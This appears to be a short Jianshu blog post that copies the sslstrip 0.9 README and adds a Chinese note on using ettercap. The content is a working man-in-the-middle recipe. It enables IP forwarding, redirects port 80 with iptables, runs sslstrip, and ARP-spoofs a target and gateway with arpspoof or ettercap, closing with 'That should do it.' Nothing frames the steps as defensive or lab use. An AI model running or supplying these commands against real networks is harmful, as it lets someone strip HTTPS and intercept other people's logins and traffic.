Requirements:
Python >= 2.5 (apt-get install python)
The python "twisted-web" module (apt-get install python-twisted-web)
Setup:
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional)
sudo python ./setup.py install
Running sslstrip:
Flip your machine into forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward
Setup iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
**Run sslstrip. **
sslstrip.py -l <listenPort>
Run arpspoof to convince a network they should send their traffic to you.
arpspoof -i <interface> -t <targetIP> <gatewayIP>或者是换成ettercap
ettercap –T –q –M arp:remote /192.168.1.101/ /网关路由/
That should do it.
SSL TRIP
最后编辑于 :
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
推荐阅读更多精彩内容
- 22年12月更新:个人网站关停,如果仍旧对旧教程有兴趣参考 Github 的markdown内容[https://...
- linux和windows下安装python拓展包-pycharm、numpy、scipy、matplotlib、...